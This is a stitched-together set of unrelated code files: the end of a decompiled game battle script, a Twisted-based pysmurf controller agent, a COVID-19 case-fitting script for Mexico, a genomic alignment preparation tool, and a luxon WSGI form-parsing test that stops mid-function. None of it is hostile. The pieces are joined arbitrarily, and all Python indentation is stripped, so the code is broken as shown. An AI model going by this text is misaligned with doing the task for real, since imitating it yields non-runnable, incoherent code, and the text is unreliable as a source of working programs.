LoadEffect(0x0, "battle\\mg133_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_5BB5", 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(3000)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
WaitChrThread(0xFF, 3)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
Return()
label("loc_5BB5")
SoundEx(549, 0x0)
SoundEx(227, 0x0)
Sleep(2100)
Yield()
SoundEx(230, 0x0)
Return()
# 中复苏术 end
def Craft_复苏术(): pass
label("复苏术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg134_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_5C2D", 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(3000)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
Return()
label("loc_5C2D")
SoundEx(183, 0x0)
SoundEx(186, 0x0)
Sleep(1800)
Yield()
SoundEx(230, 0x0)
Return()
# 复苏术 end
def Craft_全回复术(): pass
label("全回复术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg135_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_5CA3", 0x0)
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 10, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1620)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
label("loc_5CA3")
SoundEx(183, 0x0)
Sleep(100)
Yield()
SoundEx(226, 0x0)
Sleep(1050)
Yield()
SoundEx(178, 0x0)
Sleep(150)
Yield()
SoundEx(228, 0x0)
Return()
# 全回复术 end
def Craft_88_136_5CC0(): pass
label("Craft_88_136_5CC0")
# Craft_88_136_5CC0 end
SaveToFile()
Try(main)
|
from twisted.internet import reactor, protocol, threads
from twisted.python.failure import Failure
from twisted.internet.error import ProcessDone, ProcessTerminated
from twisted.internet.defer import inlineCallbacks, Deferred
from autobahn.twisted.util import sleep as dsleep
from twisted.logger import Logger, FileLogObserver
import sys
from typing import Optional
import time
import os
import argparse
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if not on_rtd:
from ocs import ocs_agent, site_config, ocs_twisted
from ocs.ocs_agent import log_formatter
from ocs.ocs_twisted import TimeoutLock
class PysmurfScriptProtocol(protocol.ProcessProtocol):
"""
The process protocol used to dispatch external Pysmurf scripts, and manage
the stdin, stdout, and stderr pipelines.
Arguments
---------
path : str
Path of script to run.
log : txaio.tx.Logger
txaio logger object, used to log stdout and stderr messages.
Attributes
-----------
path : str
Path of script to run.
log : txaio.tx.Logger
txaio logger object, used to log stdout and stderr messages.
end_status : twisted.python.failure.Failure
Reason that the process ended.
"""
def __init__(self, path, log=None):
self.path = path
self.log = log
self.end_status: Optional[Failure] = None
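# Note (added): no Deferred is created here. The caller is expected to
# attach one as `prot.deferred` before spawning the process (see
# _run_script below); processExited() fires it with the exit code.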
def connectionMade(self):
"""Called when process is started"""
self.transport.closeStdin()
def outReceived(self, data):
"""Called whenever data is received through stdout"""
if self.log:
self.log.info("{path}: {data}",
path=self.path.split('/')[-1],
data=data.strip().decode('utf-8'))
def errReceived(self, data):
"""Called whenever data is received through stderr"""
if self.log:
self.log.error(data)
def processExited(self, status: Failure):
"""Called when process has exited."""
rc = status.value.exitCode
if self.log is not None:
self.log.info("Process ended with exit code {rc}", rc=rc)
self.deferred.callback(rc)
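# Added usage sketch (not in the original): the minimal wiring this protocol
# expects, mirroring _run_script below. The helper name `spawn_script` is
# hypothetical; reactor, Deferred, sys and os are already imported above.
def spawn_script(script_path, log=None):
prot = PysmurfScriptProtocol(script_path, log=log)
prot.deferred = Deferred()  # fired with the exit code by processExited()
cmd = [sys.executable, '-u', script_path]
reactor.spawnProcess(prot, sys.executable, cmd, env=os.environ)
return prot.deferred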
class PysmurfController:
"""
Controller object for running pysmurf scripts and functions.
Args:
agent (ocs.ocs_agent.OCSAgent):
OCSAgent object which is running
args (Namespace):
argparse namespace with site_config and agent specific arguments
Attributes:
agent (ocs.ocs_agent.OCSAgent):
OCSAgent object which is running
log (txaio.tx.Logger):
txaio logger object created by agent
prot (PysmurfScriptProtocol):
protocol used to call and monitor external pysmurf scripts
protocol_lock (ocs.ocs_twisted.TimeoutLock):
lock to protect multiple pysmurf scripts from running simultaneously.
"""
def __init__(self, agent, args):
self.agent: ocs_agent.OCSAgent = agent
self.log = agent.log
self.prot = None
self.protocol_lock = TimeoutLock()
self.current_session = None
if args.monitor_id is not None:
self.agent.subscribe_on_start(
self._on_session_data,
'observatory.{}.feeds.pysmurf_session_data'.format(args.monitor_id),
)
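# Note (added): messages published by the running pysmurf script arrive here
# through the monitored feed. Payload dicts of type 'session_data' update
# session.data; strings of type 'session_log' are appended to the session
# log. Messages from other publishers are filtered out by SMURFPUB_ID.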
def _on_session_data(self, _data):
data, feed = _data
if self.current_session is not None:
if data['id'] == os.environ.get("SMURFPUB_ID"):
if data['type'] == 'session_data':
if isinstance(data['payload'], dict):
self.current_session.data.update(data['payload'])
else:
self.log.warn("Session data not passed as a dict!! Skipping...")
elif data['type'] == 'session_log':
if isinstance(data['payload'], str):
self.current_session.add_message(data['payload'])
@inlineCallbacks
def _run_script(self, script, args, log, session):
"""
Runs a pysmurf control script. Can only run from the reactor.
Args:
script (string):
path to the script you wish to run
args (list, optional):
List of command line arguments to pass to the script.
Defaults to [].
log (string or bool, optional):
Determines if and how the process's stdout should be logged.
You can pass the path to a logfile, True to use the agent's log,
or False to not log at all.
"""
with self.protocol_lock.acquire_timeout(0, job=script) as acquired:
if not acquired:
return False, "The requested script cannot be run because " \
"script {} is already running".format(self.protocol_lock.job)
self.current_session = session
try:
# IO is not really safe from the reactor thread, so we possibly
# need to find another way to do this if people use it and it
# causes problems...
logger = None
if isinstance(log, str):
self.log.info("Logging output to file {}".format(log))
log_file = yield threads.deferToThread(open, log, 'a')
logger = Logger(observer=FileLogObserver(log_file, log_formatter))
elif log:
# If log==True, use agent's logger
logger = self.log
self.prot = PysmurfScriptProtocol(script, log=logger)
self.prot.deferred = Deferred()
python_exec = sys.executable
cmd = [python_exec, '-u', script] + list(map(str, args))
self.log.info("{exec}, {cmd}", exec=python_exec, cmd=cmd)
reactor.spawnProcess(self.prot, python_exec, cmd, env=os.environ)
rc = yield self.prot.deferred
return (rc == 0), "Script has finished with exit code {}".format(rc)
finally:
# Sleep to allow any remaining messages to be put into the
# session var
yield dsleep(1.0)
self.current_session = None
@inlineCallbacks
def run(self, session, params=None):
"""run(script, args=[], log=True)
**Task** - Runs a pysmurf control script.
Parameters:
script (string):
Path of the pysmurf script to run.
args (list, optional):
List of command line arguments to pass to the script. Defaults
to [].
log (string/bool, optional):
Determines if and how the process's stdout should be logged.
You can pass the path to a logfile, True to use the agent's
log, or False to not log at all.
Notes:
Data and logs may be passed from the pysmurf control script to the
session object by publishing it via the Pysmurf Publisher using the
message types ``session_data`` and ``session_log`` respectively.
For example, below is a simple script which starts the data stream
and returns the datfile path and the list of active channels to the
session::
active_channels = S.which_on(0)
datafile = S.stream_data_on()
S.pub.publish({
'datafile': datafile, 'active_channels': active_channels
}, msgtype='session_data')
This would result in the following session.data object::
>>> {
'datafile': '/data/smurf_data/20200316/1584401673/outputs/1584402020.dat',
'active_channels': [0,1,2,3,4]
}
"""
ok, msg = yield self._run_script(
params['script'],
params.get('args', []),
params.get('log', True),
session
)
return ok, msg
def abort(self, session, params=None):
"""abort()
**Task** - Aborts the actively running script.
"""
if self.prot is None:
return False, "No script is currently running"
self.prot.transport.signalProcess('KILL')
return True, "Aborting process"
@inlineCallbacks
def tune_squids(self, session, params=None):
"""tune_squids(args=[], log=True)
**Task** - Runs the fake script /config/scripts/pysmurf/tune_squids.py
Args:
args (list, optional):
List of command line arguments to pass to the script.
Defaults to [].
log (string/bool, optional):
Determines if and how the process's stdout should be logged.
You can pass the path to a logfile, True to use the agent's log,
or False to not log at all.
"""
if params is None:
params = {}
ok, msg = yield self._run_script(
'/config/scripts/pysmurf/tune_squids.py',
params.get('args', []),
params.get('log', True),
session
)
return ok, msg
def make_parser(parser=None):
"""
Builds an argparse parser, allowing sphinx to auto-document it.
"""
if parser is None:
parser = argparse.ArgumentParser()
pgroup = parser.add_argument_group('Agent Options')
pgroup.add_argument('--monitor-id', '-m', type=str,
help="Instance id for pysmurf-monitor corresponding to "
"this pysmurf instance.")
return parser
if __name__ == '__main__':
parser = make_parser()
args = site_config.parse_args(agent_class='PysmurfController', parser=parser)
agent, runner = ocs_agent.init_site_agent(args)
controller = PysmurfController(agent, args)
agent.register_task('run', controller.run, blocking=False)
agent.register_task('abort', controller.abort, blocking=False)
agent.register_task('tune_squids', controller.tune_squids, blocking=False)
runner.run(agent, auto_reconnect=True)
|
###-----------###
### Importing ###
###-----------###
import pandas as pd
import numpy as np
import datetime
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
###------------------###
### Helper Functions ###
###------------------###
## Time series management
def national_timeseries(df, log=False):
'''
Returns a dataframe with the national number of COVID cases for Mexico where each row is indexed by a date (t0 = 2020-02-28).
If log=True, return the log of the cases.
'''
if log:
return np.log10( df.set_index('Fecha').loc[:,['México']] )
else:
return df.set_index('Fecha').loc[:,['México']]
###-------###
### Model ###
###-------###
def exponential_model(t, y0, β): return y0 * np.exp(β*t)
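# β is the continuous daily growth rate of the fit, so the implied doubling
# time is ln(2)/β days.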
if __name__ == "__main__":
# Reading data
DATA_URL_MEX = 'https://raw.githubusercontent.com/mexicovid19/Mexico-datos/master/datos/series_de_tiempo/'
mex_confirmed = pd.read_csv(DATA_URL_MEX+'covid19_mex_casos_totales.csv', )
# paths for saving
PLOT_PATH = '../media/'
CSV_PATH = '../results/'
save_ = True
# Fit time window
n_days = 7
total_cases_timeseries = national_timeseries(mex_confirmed).iloc[-n_days:,0]
# Data preparation
xdata = np.array( range(len(total_cases_timeseries)) )
ydata = total_cases_timeseries.values
# Initial parameter guess
p0 = [ydata[-1], 0.1]
# Model parameter fit. Returns parameters and their covariance matrix
popt, pcov = curve_fit(exponential_model, xdata, ydata, p0)
# Projection days
forecast_horizon = 2 # days
# Growth rate std
σ = np.sqrt( pcov[1,1] )
# Fitting and projecting
xfit = range( len(xdata) + forecast_horizon )
yfit = exponential_model(xfit, *popt)
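    # Rough ~95% envelope: perturb only the growth rate by ±2σ while keeping
    # the fitted y0 fixed (assumes the estimate of β is approximately Gaussian).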
    yfit_min = exponential_model(xfit[-(forecast_horizon+1):], popt[0], popt[1] - 2*σ)
    yfit_max = exponential_model(xfit[-(forecast_horizon+1):], popt[0], popt[1] + 2*σ)
# helper temporal values
trange = total_cases_timeseries.index.values
t0 = datetime.datetime.strptime( trange[0], '%Y-%m-%d')
tfit = [(t0 + datetime.timedelta(days=t)).strftime('%Y-%m-%d') for t in xfit ]
# Dataframe with fits and data
Data = national_timeseries(mex_confirmed)
Data['México'] = Data['México'].astype(int)
CSV = Data.join(pd.Series( np.round(yfit), tfit, name='Fit'), how='outer' )
CSV = CSV.join(pd.Series( np.round(yfit_min), tfit[-(forecast_horizon+1):], name='Fit_min'), how='outer' )
CSV = CSV.join(pd.Series( np.round(yfit_max), tfit[-(forecast_horizon+1):], name='Fit_max'), how='outer' )
CSV.index.rename('Fecha', inplace=True)
print(CSV)
# Plotting
plt.figure( figsize=(10,8) )
# plot data
plt.plot(trange, ydata, lw=0, marker='o', ms=8)
# plot fit
    plt.plot(tfit, yfit, c='orange', label='tasa esperada: {} % diario'.format(np.round(popt[1]*100, 1)))
# error cones
plt.fill_between(tfit[-(forecast_horizon+1):], yfit_min, yfit_max,
alpha=0.2, color='orange');
plt.title( 'Casos totales de COVID-19 en {}'.format( 'México' ) , size=16)
plt.ylabel('Número de casos', size=15);
plt.legend(loc='upper left')
plt.xticks(rotation=45)
# plt.yscale('log')
plt.tight_layout()
if save_:
plt.savefig( PLOT_PATH+'covid19_mex_fit.png' )
CSV.to_csv( CSV_PATH+'covid19_mex_fit.csv' )
plt.show()
else:
print(CSV)
plt.show()
|
from Bio import SeqIO
from argparse import (ArgumentParser, FileType)
import os, sys, re, collections, operator, math, time, base64
import pandas as pd
import hashlib, copy
from subprocess import Popen, PIPE
from Bio import GenBank
from parsityper.helpers import read_fasta
from parsityper.version import __version__
def parse_args():
"Parse the input arguments, use '-h' for help"
parser = ArgumentParser(description='Analyse MSA')
parser.add_argument('--input_msa', type=str, required=True, help='Aligned fasta file')
parser.add_argument('--input_meta', type=str, required=True,
help='tab delimited sample genotype information')
parser.add_argument('--ref_id', type=str, required=True,
help='sample_id for reference sequence to use in MSA')
parser.add_argument('--ref_gbk', type=str, required=True,
help='GenBank file for reference sequences')
parser.add_argument('--outdir', type=str, required=True,
help='output directory')
parser.add_argument('--max_samples', type=int, required=False, help='Maximum number of samples per genotype',default=100)
parser.add_argument('--min_length', type=int, required=False, help='Minimum sequence length',default=-1)
    parser.add_argument('--min_freq', type=int, required=False, help='Minimum occurrences of a mutation', default=1)
parser.add_argument('--max_ambig_perc', type=float, required=False,
help='Maximum percentage of ambiguous characters',default=1.0)
    parser.add_argument('--min_genotype_count', type=int, required=False,
                        help='Minimum number of samples for a genotype to be included', default=1)
parser.add_argument('--seed', type=int, required=False,
help='Seed for random generator', default=42)
parser.add_argument('--folder_size', type=int, required=False, help='Maximum number of samples per folder',
default=5000)
parser.add_argument('--n_threads', type=int, required=False,
help='Num threads to use', default=1)
    parser.add_argument('--train_proportion', type=float, required=False,
                        help='Proportion of samples to use for training', default=0.8)
parser.add_argument('--select_best_seqs', required=False,
help='Flag to toggle selecting highest quality seqs for scheme development',action='store_true')
parser.add_argument('-V', '--version', action='version', version='%(prog)s {}'.format(__version__))
return parser.parse_args()
def read_metadata(file):
return pd.read_csv(file, header=0, sep="\t")
def read_sample_mapping(df, sample_col, genotype_col):
metadata = {}
for index, row in df.iterrows():
sample_id = str(row[sample_col])
genotype = str(row[genotype_col])
metadata[sample_id] = genotype
return metadata
def summarize_genotypes(sample_info):
genotype_counts = sample_info['genotype'].value_counts().reset_index(name="count")
genotype_counts.columns = ['genotype', 'count']
return genotype_counts
def create_fasta_folder_structure(outdir, genotypes):
if not os.path.isdir(outdir):
os.mkdir(outdir, 0o755)
for genotype in genotypes:
path = os.path.join(outdir, str(genotype))
if not os.path.isdir(path):
os.mkdir(path, 0o755)
def calc_md5(seq):
seq = str(seq).encode()
md5 = hashlib.md5()
md5.update(seq)
return md5.hexdigest()
def folder_tracker(genotype_counts_df):
tracker = {}
for row in genotype_counts_df.itertuples():
genotype = row.genotype
count = row.count
tracker[genotype] = {'total': count, 'index': 0, 'tracker': 0}
return tracker
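# Consensus call: per alignment position, take the argmax over the base-count
# columns of the position-by-base dataframe.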
def generate_consensus(df):
maxValueIndexObj = df.idxmax(axis=1)
return maxValueIndexObj.tolist()
def create_pseudoseqs(consensus, df, min_count):
seqs = {
'consensus':consensus,
'A':copy.deepcopy(consensus),
'T': copy.deepcopy(consensus),
'C': copy.deepcopy(consensus),
'G': copy.deepcopy(consensus)
}
for row in df.itertuples():
pos=row.pos
if consensus[pos] == '-' or consensus[pos] == 'N':
continue
if row.A >= min_count:
seqs['A'][pos] = 'A'
if row.T >= min_count:
seqs['T'][pos] = 'T'
if row.C >= min_count:
seqs['C'][pos] = 'C'
if row.G >= min_count:
seqs['G'][pos] = 'G'
return seqs
def parse_mafft(out):
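    """Parse mafft's FASTA-formatted stdout into a dict of {seq_id: sequence}."""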
lines = out.split('\n')
seqs = {}
id = ''
seq = []
for line in lines:
line = line.strip()
if line == '':
continue
if line[0] == '>':
if id == '':
id = line.replace('>', '')
else:
seqs[id] = ''.join(seq)
seq = []
id = line.replace('>','')
else:
seq.append(line)
seqs[id] = ''.join(seq)
return seqs
def run_mafft(in_seq,threads):
p = Popen(['mafft',
'--auto', '--quiet', '--thread',"{}".format(threads),
in_seq],
stdin=PIPE,
stdout=PIPE,
stderr=PIPE)
stdout, stderr = p.communicate()
if isinstance(stdout, bytes):
stdout = stdout.decode()
return (stdout, stderr)
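# Walk two aligned sequences left to right, mapping each position of seq_1 to
# the position of the first matching base in seq_2; gap columns in seq_1 map
# to -1 so callers can skip them.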
def map_positions(seq_1,seq_2):
look_up = {}
seq_2_len = len(seq_2)
seq_2_pos = 0
for i in range(0,len(seq_1)):
base_1 = seq_1[i]
if base_1 == '-':
look_up[i] = {'ref_aln_pos':i,'mapped_aln_pos':-1}
continue
for k in range(seq_2_pos,seq_2_len):
base_2 = seq_2[k]
seq_2_pos += 1
if base_1 == base_2:
look_up[i] = {'ref_aln_pos': i, 'mapped_aln_pos': k}
break
return look_up
def get_valid_positions(global_consensus,threshold=1):
valid_positions = []
for i in range(0, len(global_consensus)):
data = global_consensus[i]
count_bases = data['A'] + data['T'] + data['C'] + data['G']
if count_bases >= threshold:
valid_positions.append(i)
return valid_positions
def create_alignment(ref_lookup,ref_id,ref_seq,seqs,valid_positions,n_threads=1):
aln = {ref_id:ref_seq.upper()}
ref_len = len(ref_seq)
for seq_id in seqs:
seq = seqs[seq_id]
aln_seq = ['-'] * ref_len
for i in range(0,len(seq)):
base = seq[i]
if i not in valid_positions:
continue
mapped_aln_pos = ref_lookup[i]['mapped_aln_pos']
if mapped_aln_pos == -1:
continue
aln_seq[mapped_aln_pos] = base
aln[seq_id] = ''.join(aln_seq)
return aln
def mafft_add_seq(input_ref_seq,input_msa,output,n_threads):
fh = open(output,'w')
p = Popen(['mafft', '--add',input_ref_seq,
'--auto', '--quiet', '--thread',"{}".format(n_threads),
input_msa],
stdin=PIPE,
stdout=fh,
stderr=PIPE)
stdout, stderr = p.communicate()
fh.close()
return (stderr)
def create_training_sets(seq_info_df,proportion,max_size,seed):
training_sets = {}
genotypes = seq_info_df['genotype'].unique().tolist()
seq_info_df = seq_info_df.drop_duplicates(subset="md5")
for genotype in genotypes:
subset = seq_info_df[seq_info_df['genotype'] == genotype].sample(frac=proportion, replace=False, random_state=seed)
sample_ids = subset['sample_id'].tolist()
if len(sample_ids) > max_size:
            sample_ids = sample_ids[:max_size]
training_sets[genotype] = sample_ids
return training_sets
def run():
cmd_args = parse_args()
fasta_file = cmd_args.input_msa
meta_file = cmd_args.input_meta
outdir = cmd_args.outdir
min_genotype_count = cmd_args.min_genotype_count
max_samples = cmd_args.max_samples
min_length = cmd_args.min_length
max_ambig_perc = cmd_args.max_ambig_perc
seed = cmd_args.seed
train_proportion = cmd_args.train_proportion
ref_gbk = cmd_args.ref_gbk
folder_size = cmd_args.folder_size
min_freq = cmd_args.min_freq
n_threads = cmd_args.n_threads
if not os.path.isdir(outdir):
os.mkdir(outdir, 0o755)
fasta_outdir = os.path.join(outdir, 'fastas')
scheme_datadir = os.path.join(outdir, 'scheme_data')
if not os.path.isdir(scheme_datadir):
os.mkdir(scheme_datadir, 0o755)
benchmark_datadir = os.path.join(outdir, 'benchmark_data')
if not os.path.isdir(benchmark_datadir):
os.mkdir(benchmark_datadir, 0o755)
meta_df = read_metadata(meta_file)
genotype_count_df = summarize_genotypes(meta_df)
genotype_count_df['genotype'] = genotype_count_df['genotype'].astype(str)
genotype_count_df.to_csv(os.path.join(outdir, "genotype_counts.txt"), index=False, sep="\t")
genotype_count_df = genotype_count_df[genotype_count_df['count'] >= min_genotype_count]
valid_genotypes = genotype_count_df['genotype'].tolist()
sample_mapping = read_sample_mapping(meta_df, 'sample_id', 'genotype')
create_fasta_folder_structure(fasta_outdir, valid_genotypes)
tracker = folder_tracker(genotype_count_df)
for genotype in tracker:
if not os.path.isdir(os.path.join(fasta_outdir, "{}/{}".format(genotype, tracker[genotype]['index']))):
os.mkdir(os.path.join(fasta_outdir, "{}/{}".format(genotype, tracker[genotype]['index'])), 0o755)
align_len = 0
genotype_consensus = {}
erroneous_seqs_fh = open(os.path.join(outdir, 'error_seqs.txt'), 'w')
seq_report_fh = open(os.path.join(outdir, 'seq_info.txt'), 'w')
seq_report_fh.write("sample_id\tgenotype\tmd5\tnum_seq_bases\tambig_count\tgap_count\tstatus\n")
global_consensus = []
unalign_file = os.path.join(outdir, 'unaligned.fasta')
unalign_fh = open(unalign_file, 'w')
for seq_record in SeqIO.parse(fasta_file, format='fasta'):
seq = str(seq_record.seq).upper()
length = len(seq)
        seq = re.sub(r'[^ATCG-]', 'N', seq)  # anything that is not A/T/C/G/- becomes N
gap_count = seq.count('-')
ambig_count = seq.count('N')
num_seq_bases = length - (gap_count + ambig_count)
md5 = calc_md5(seq)
if align_len == 0:
align_len = length
if len(global_consensus) == 0:
for i in range(0, length):
global_consensus.append({'A': 0, 'T': 0, 'C': 0, 'G': 0, 'N': 0, '-': 0})
id = str(seq_record.id)
if align_len != length:
erroneous_seqs_fh.write("{}\t{}\t{}\n".format(seq_record, length, "mismatched length"))
continue
elif len(id) < 1:
erroneous_seqs_fh.write("{}\t{}\t{}\n".format(seq_record, length, "ID field malformed"))
continue
elif not id in sample_mapping:
erroneous_seqs_fh.write("{}\t{}\t{}\n".format(seq_record, length, "Sample ID not in genotype associations"))
continue
sample_id = id
genotype = sample_mapping[sample_id]
        ambig_perc = ambig_count / num_seq_bases if num_seq_bases > 0 else float('inf')
status = 'Pass'
if ambig_perc > max_ambig_perc or num_seq_bases < min_length or genotype not in valid_genotypes:
status = 'Fail'
if genotype not in genotype_consensus and status == 'Pass':
genotype_consensus[genotype] = []
for i in range(0, length):
genotype_consensus[genotype].append({'A': 0, 'T': 0, 'C': 0, 'G': 0, 'N': 0, '-': 0})
if status == 'Pass':
for i in range(0, length):
base = seq[i]
genotype_consensus[genotype][i][base] += 1
global_consensus[i][base] += 1
tracker[genotype]['tracker']+=1
if tracker[genotype]['tracker'] >= folder_size:
tracker[genotype]['tracker'] = 0
tracker[genotype]['index']+=1
if not os.path.isdir(os.path.join(fasta_outdir, "{}/{}".format(genotype, tracker[genotype]['index']))):
os.mkdir(os.path.join(fasta_outdir, "{}/{}".format(genotype, tracker[genotype]['index'])), 0o755)
fasta_out = os.path.join(fasta_outdir, genotype)
fasta_out = os.path.join(fasta_out, str(tracker[genotype]['index']))
            seq_fh = open(os.path.join(fasta_out, "{}.fasta".format(sample_id)), 'w')
            seq_fh.write(">{}\n{}\n".format(sample_id, re.sub(r'-', '', seq)))
            seq_fh.close()
            unalign_fh.write(">{}\n{}\n".format(sample_id, re.sub(r'-', '', seq)))
seq_report_fh.write(
"{}\t{}\t{}\t{}\t{}\t{}\t{}\n".format(sample_id, genotype, md5, num_seq_bases, ambig_count, gap_count,status))
    erroneous_seqs_fh.close()
    seq_report_fh.close()
    unalign_fh.close()
seq_info_df = read_metadata(os.path.join(outdir, 'seq_info.txt'))
seq_info_df = seq_info_df[seq_info_df['status'] == 'Pass']
consensus_outdir = os.path.join(outdir, 'consensus')
if not os.path.isdir(consensus_outdir):
os.mkdir(consensus_outdir, 0o755)
consensus_df = pd.DataFrame(global_consensus)
consensus_df.to_csv(
os.path.join(consensus_outdir, "{}_consensus_report.txt".format('global')))
global_consensus_seq = generate_consensus(consensus_df)
consensus_df['pos'] = consensus_df.index
    pseudo_seqs = create_pseudoseqs(global_consensus_seq, consensus_df, min_freq)
cons_seqs = {}
for genotype in genotype_consensus:
pd.DataFrame(genotype_consensus[genotype]).to_csv(
os.path.join(consensus_outdir, "{}_consensus_report.txt".format(genotype)))
cons_seq = []
for pos in genotype_consensus[genotype]:
cons_seq.append(max(pos.items(), key=operator.itemgetter(1))[0])
cons_seqs[genotype] = cons_seq
with open(ref_gbk) as handle:
for record in GenBank.parse(handle):
gb_accession = record.accession[0]
gb_accession_version = record.version.split('.')[1]
            genome_seq = str(record.sequence)
unaligned = ">{}\n{}\n>{}\n{}\n".format(gb_accession,genome_seq,"consensus",''.join(pseudo_seqs["consensus"]))
unaligned_file = os.path.join(outdir,"unaligned.fas")
fh = open(unaligned_file,'w')
fh.write(unaligned)
fh.close()
(stdout,stderr) = run_mafft(unaligned_file,n_threads)
os.remove(unaligned_file)
aligned_seq = parse_mafft(stdout)
ref_lookup = map_positions(global_consensus_seq, list(aligned_seq['consensus'].upper()))
valid_positions = get_valid_positions(global_consensus,min_freq)
training_sets = create_training_sets(seq_info_df, train_proportion, max_samples, seed)
training_samples = []
for genotype in training_sets:
training_samples.extend(training_sets[genotype])
test_sets = create_training_sets(seq_info_df[~seq_info_df['sample_id'].isin(training_samples)], 1-train_proportion, max_samples, seed)
test_samples = []
for genotype in test_sets:
test_samples.extend(test_sets[genotype])
train_seqs = {}
for seq_record in SeqIO.parse(fasta_file, format='fasta'):
seq = str(seq_record.seq).upper()
        seq = re.sub(r'[^ATCG-]', 'N', seq)
id = str(seq_record.id)
if id in training_samples:
path_prefix = scheme_datadir
elif id in test_samples:
path_prefix = benchmark_datadir
else:
continue
fasta_fh = open(os.path.join(path_prefix,"{}.fasta".format(id)), 'w')
fasta_fh.write(">{}\n{}\n".format(id,seq.replace('-','')))
fasta_fh.close()
train_seqs[id] = seq
pseudo_seqs.update(cons_seqs)
pseudo_seqs.update(train_seqs)
ref_seq_path = os.path.join(outdir, "ref.unaligned.fasta")
input_msa_path = os.path.join(outdir, "pseudo.unaligned.fasta")
fasta_fh = open(input_msa_path, 'w')
for id in pseudo_seqs:
if isinstance(pseudo_seqs[id],list):
pseudo_seqs[id] = ''.join(pseudo_seqs[id])
fasta_fh.write(">{}\n{}\n".format(id, pseudo_seqs[id]))
fasta_fh.close()
    fasta_fh = open(ref_seq_path, 'w')
    fasta_fh.write(">{}\n{}\n".format(gb_accession, ''.join(genome_seq)))
    fasta_fh.close()
    output_msa = os.path.join(consensus_outdir, "allgenotype_consensus.fasta")
mafft_add_seq(ref_seq_path, input_msa_path, output_msa, n_threads)
# call main function
if __name__ == '__main__':
run()
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Christiaan Frans Rademan <chris@fwiw.co.za>.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import pytest
from luxon import register
@pytest.fixture(scope="module")
def client():
from luxon.testing.wsgi.client import Client
return Client(__file__)
payload = """-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="text"
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="multiple_text"
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="multiple_text"
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="file"; filename="file"
Content-Type: application/octet-stream
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="multiple_file"; filename="file"
Content-Type: application/octet-stream
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="multiple_file"; filename="file"
Content-Type: application/octet-stream
test
-----------------------------88571074919314010861842727997--"""
headers = {}
headers['Content-Type'] = "multipart/form-data;" + \
"boundary=---------------------------" + \
"88571074919314010861842727997"
headers['Content-Length'] = "950"
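# Note: the boundary declared in Content-Type must match the delimiter lines in
# `payload` above (each delimiter is the boundary prefixed with "--").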
def test_wsgi_form_json(client):
@register.resource('POST', '/form_json')
def form_json(req, resp):
return req.form_json
result = client.post(path='/form_json', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
assert response['text'] == 'test'
assert isinstance(response['multiple_text'], list)
for i in range(2):
assert response['multiple_text'][i] == 'test'
assert response['file']['name'] == 'file'
assert response['file']['type'] == 'application/octet-stream'
assert response['file']['base64'] == 'dGVzdAo=\n'
assert isinstance(response['multiple_file'], list)
for i in range(2):
assert response['multiple_file'][i]['name'] == 'file'
assert response['multiple_file'][i]['type'] == 'application/octet-stream'
assert response['multiple_file'][i]['base64'] == 'dGVzdAo=\n'
def test_wsgi_form_get_first(client):
@register.resource('POST', '/form_get_first')
def form_get_first(req, resp):
return req.get_first('text')
result = client.post(path='/form_get_first', headers=headers, body=payload)
assert result.status_code == 200
assert result.text == 'test'
def test_wsgi_form_get_list(client):
@register.resource('POST', '/form_get_list')
